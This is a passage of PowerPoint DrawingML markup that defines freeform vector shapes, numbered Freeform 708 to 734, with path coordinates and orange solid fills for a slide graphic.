                      <a:lnTo>
                        <a:pt x="140" y="453"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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8" name="Freeform 708"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3364" y="1971"/>
                  <a:ext cx="30" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 206 w 206"/>
                    <a:gd name="T1" fmla="*/ 0 h 562"/>
                    <a:gd name="T2" fmla="*/ 206 w 206"/>
                    <a:gd name="T3" fmla="*/ 508 h 562"/>
                    <a:gd name="T4" fmla="*/ 0 w 206"/>
                    <a:gd name="T5" fmla="*/ 562 h 562"/>
                    <a:gd name="T6" fmla="*/ 0 w 206"/>
                    <a:gd name="T7" fmla="*/ 54 h 562"/>
                    <a:gd name="T8" fmla="*/ 206 w 206"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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6" h="562">
                      <a:moveTo>
                        <a:pt x="206" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="206" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="562"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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19" name="Freeform 709"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3369" y="1975"/>
                  <a:ext cx="20" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 492"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 454 h 492"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 492 h 492"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 38 h 492"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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0" h="492">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="454"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="492"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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0" name="Freeform 710"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3325" y="2048"/>
                  <a:ext cx="20" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 37 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 37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0" h="73">
                      <a:moveTo>
                        <a:pt x="140" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="37"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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711"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3369" y="2037"/>
                  <a:ext cx="20" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 38 h 76"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 76"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 76 h 76"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 38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0" h="76">
                      <a:moveTo>
                        <a:pt x="140" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="38"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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712"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3413" y="2024"/>
                  <a:ext cx="21" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 38 h 76"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 76"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 76 h 76"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 38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0" h="76">
                      <a:moveTo>
                        <a:pt x="140" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="38"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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713"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3458" y="2013"/>
                  <a:ext cx="20" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 35 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 35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0" h="73">
                      <a:moveTo>
                        <a:pt x="140" y="35"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="35"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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714"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3502" y="2000"/>
                  <a:ext cx="20" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 38 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 139"/>
                    <a:gd name="T3" fmla="*/ 0 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 139 w 139"/>
                    <a:gd name="T7" fmla="*/ 38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9" h="73">
                      <a:moveTo>
                        <a:pt x="139" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="38"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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Freeform 715"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3546" y="1989"/>
                  <a:ext cx="21" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 37 h 75"/>
                    <a:gd name="T2" fmla="*/ 0 w 139"/>
                    <a:gd name="T3" fmla="*/ 0 h 75"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 75 h 75"/>
                    <a:gd name="T6" fmla="*/ 139 w 139"/>
                    <a:gd name="T7" fmla="*/ 37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9" h="75">
                      <a:moveTo>
                        <a:pt x="139" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="37"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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6" name="Freeform 716"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3591" y="1976"/>
                  <a:ext cx="20" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 38 h 75"/>
                    <a:gd name="T2" fmla="*/ 0 w 139"/>
                    <a:gd name="T3" fmla="*/ 0 h 75"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 75 h 75"/>
                    <a:gd name="T6" fmla="*/ 139 w 139"/>
                    <a:gd name="T7" fmla="*/ 38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9" h="75">
                      <a:moveTo>
                        <a:pt x="139" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="38"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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7" name="Freeform 717"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3635" y="1965"/>
                  <a:ext cx="20" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 35 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 139"/>
                    <a:gd name="T3" fmla="*/ 0 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 139 w 139"/>
                    <a:gd name="T7" fmla="*/ 35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9" h="73">
                      <a:moveTo>
                        <a:pt x="139" y="35"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="35"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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8" name="Freeform 718"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3238" y="1772"/>
                  <a:ext cx="472" cy="127"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 3250 w 3250"/>
                    <a:gd name="T1" fmla="*/ 40 h 872"/>
                    <a:gd name="T2" fmla="*/ 3101 w 3250"/>
                    <a:gd name="T3" fmla="*/ 0 h 872"/>
                    <a:gd name="T4" fmla="*/ 0 w 3250"/>
                    <a:gd name="T5" fmla="*/ 831 h 872"/>
                    <a:gd name="T6" fmla="*/ 149 w 3250"/>
                    <a:gd name="T7" fmla="*/ 872 h 872"/>
                    <a:gd name="T8" fmla="*/ 3250 w 3250"/>
                    <a:gd name="T9" fmla="*/ 40 h 8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50" h="872">
                      <a:moveTo>
                        <a:pt x="3250" y="40"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3101" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="831"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="149" y="872"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3250" y="40"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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9" name="Freeform 720"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2971" y="1700"/>
                  <a:ext cx="472" cy="126"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 3250 w 3250"/>
                    <a:gd name="T1" fmla="*/ 40 h 871"/>
                    <a:gd name="T2" fmla="*/ 3102 w 3250"/>
                    <a:gd name="T3" fmla="*/ 0 h 871"/>
                    <a:gd name="T4" fmla="*/ 0 w 3250"/>
                    <a:gd name="T5" fmla="*/ 831 h 871"/>
                    <a:gd name="T6" fmla="*/ 146 w 3250"/>
                    <a:gd name="T7" fmla="*/ 871 h 871"/>
                    <a:gd name="T8" fmla="*/ 3250 w 3250"/>
                    <a:gd name="T9" fmla="*/ 40 h 8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50" h="871">
                      <a:moveTo>
                        <a:pt x="3250" y="40"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3102" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="831"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="146" y="871"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3250" y="40"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="230" name="Group 723"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2996" y="1837"/>
                  <a:ext cx="66" cy="66"/>
                  <a:chOff x="3829" y="1553"/>
                  <a:chExt cx="74" cy="74"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="246" name="Freeform 724"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1553"/>
                    <a:ext cx="74" cy="20"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 570"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 570 w 570"/>
                      <a:gd name="T3" fmla="*/ 116 h 156"/>
                      <a:gd name="T4" fmla="*/ 149 w 570"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 0 w 570"/>
                      <a:gd name="T7" fmla="*/ 40 h 156"/>
                      <a:gd name="T8" fmla="*/ 421 w 570"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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0" h="156">
                        <a:moveTo>
                          <a:pt x="421" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="570" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="156"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21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7" name="Freeform 725"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1558"/>
                    <a:ext cx="55" cy="69"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 421"/>
                      <a:gd name="T1" fmla="*/ 537 h 537"/>
                      <a:gd name="T2" fmla="*/ 421 w 421"/>
                      <a:gd name="T3" fmla="*/ 116 h 537"/>
                      <a:gd name="T4" fmla="*/ 0 w 421"/>
                      <a:gd name="T5" fmla="*/ 0 h 537"/>
                      <a:gd name="T6" fmla="*/ 0 w 421"/>
                      <a:gd name="T7" fmla="*/ 421 h 537"/>
                      <a:gd name="T8" fmla="*/ 421 w 421"/>
                      <a:gd name="T9" fmla="*/ 537 h 5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21" h="537">
                        <a:moveTo>
                          <a:pt x="421" y="537"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="421" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="421"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="537"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF9966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8" name="Freeform 726"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3884" y="1568"/>
                    <a:ext cx="19" cy="59"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 461 h 461"/>
                      <a:gd name="T2" fmla="*/ 149 w 149"/>
                      <a:gd name="T3" fmla="*/ 420 h 461"/>
                      <a:gd name="T4" fmla="*/ 149 w 149"/>
                      <a:gd name="T5" fmla="*/ 0 h 461"/>
                      <a:gd name="T6" fmla="*/ 0 w 149"/>
                      <a:gd name="T7" fmla="*/ 38 h 461"/>
                      <a:gd name="T8" fmla="*/ 0 w 149"/>
                      <a:gd name="T9" fmla="*/ 461 h 4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9" h="461">
                        <a:moveTo>
                          <a:pt x="0" y="461"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="149" y="420"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="461"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21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31" name="Group 727"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3044" y="1850"/>
                  <a:ext cx="67" cy="66"/>
                  <a:chOff x="3829" y="1553"/>
                  <a:chExt cx="74" cy="74"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="243" name="Freeform 728"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1553"/>
                    <a:ext cx="74" cy="20"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 570"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 570 w 570"/>
                      <a:gd name="T3" fmla="*/ 116 h 156"/>
                      <a:gd name="T4" fmla="*/ 149 w 570"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 0 w 570"/>
                      <a:gd name="T7" fmla="*/ 40 h 156"/>
                      <a:gd name="T8" fmla="*/ 421 w 570"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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0" h="156">
                        <a:moveTo>
                          <a:pt x="421" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="570" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="156"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21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4" name="Freeform 729"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1558"/>
                    <a:ext cx="55" cy="69"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 421"/>
                      <a:gd name="T1" fmla="*/ 537 h 537"/>
                      <a:gd name="T2" fmla="*/ 421 w 421"/>
                      <a:gd name="T3" fmla="*/ 116 h 537"/>
                      <a:gd name="T4" fmla="*/ 0 w 421"/>
                      <a:gd name="T5" fmla="*/ 0 h 537"/>
                      <a:gd name="T6" fmla="*/ 0 w 421"/>
                      <a:gd name="T7" fmla="*/ 421 h 537"/>
                      <a:gd name="T8" fmla="*/ 421 w 421"/>
                      <a:gd name="T9" fmla="*/ 537 h 5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21" h="537">
                        <a:moveTo>
                          <a:pt x="421" y="537"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="421" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="421"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="537"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF9966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5" name="Freeform 730"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3884" y="1568"/>
                    <a:ext cx="19" cy="59"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 461 h 461"/>
                      <a:gd name="T2" fmla="*/ 149 w 149"/>
                      <a:gd name="T3" fmla="*/ 420 h 461"/>
                      <a:gd name="T4" fmla="*/ 149 w 149"/>
                      <a:gd name="T5" fmla="*/ 0 h 461"/>
                      <a:gd name="T6" fmla="*/ 0 w 149"/>
                      <a:gd name="T7" fmla="*/ 38 h 461"/>
                      <a:gd name="T8" fmla="*/ 0 w 149"/>
                      <a:gd name="T9" fmla="*/ 461 h 4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9" h="461">
                        <a:moveTo>
                          <a:pt x="0" y="461"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="149" y="420"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="38"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="461"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21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32" name="Group 731"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3093" y="1862"/>
                  <a:ext cx="66" cy="67"/>
                  <a:chOff x="3829" y="1553"/>
                  <a:chExt cx="74" cy="74"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="240" name="Freeform 732"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1553"/>
                    <a:ext cx="74" cy="20"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 570"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 570 w 570"/>
                      <a:gd name="T3" fmla="*/ 116 h 156"/>
                      <a:gd name="T4" fmla="*/ 149 w 570"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 0 w 570"/>
                      <a:gd name="T7" fmla="*/ 40 h 156"/>
                      <a:gd name="T8" fmla="*/ 421 w 570"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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0" h="156">
                        <a:moveTo>
                          <a:pt x="421" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="570" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="149" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="156"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF6B21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1" name="Freeform 733"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3829" y="1558"/>
                    <a:ext cx="55" cy="69"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 421 w 421"/>
                      <a:gd name="T1" fmla="*/ 537 h 537"/>
                      <a:gd name="T2" fmla="*/ 421 w 421"/>
                      <a:gd name="T3" fmla="*/ 116 h 537"/>
                      <a:gd name="T4" fmla="*/ 0 w 421"/>
                      <a:gd name="T5" fmla="*/ 0 h 537"/>
                      <a:gd name="T6" fmla="*/ 0 w 421"/>
                      <a:gd name="T7" fmla="*/ 421 h 537"/>
                      <a:gd name="T8" fmla="*/ 421 w 421"/>
                      <a:gd name="T9" fmla="*/ 537 h 5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21" h="537">
                        <a:moveTo>
                          <a:pt x="421" y="537"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="421" y="116"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="421"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="421" y="537"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="FF9966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2" name="Freeform 734"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3884" y="1568"/>
                    <a:ext cx="19" cy="59"/>
                  </a:xfrm>
                  <a:custGeom>
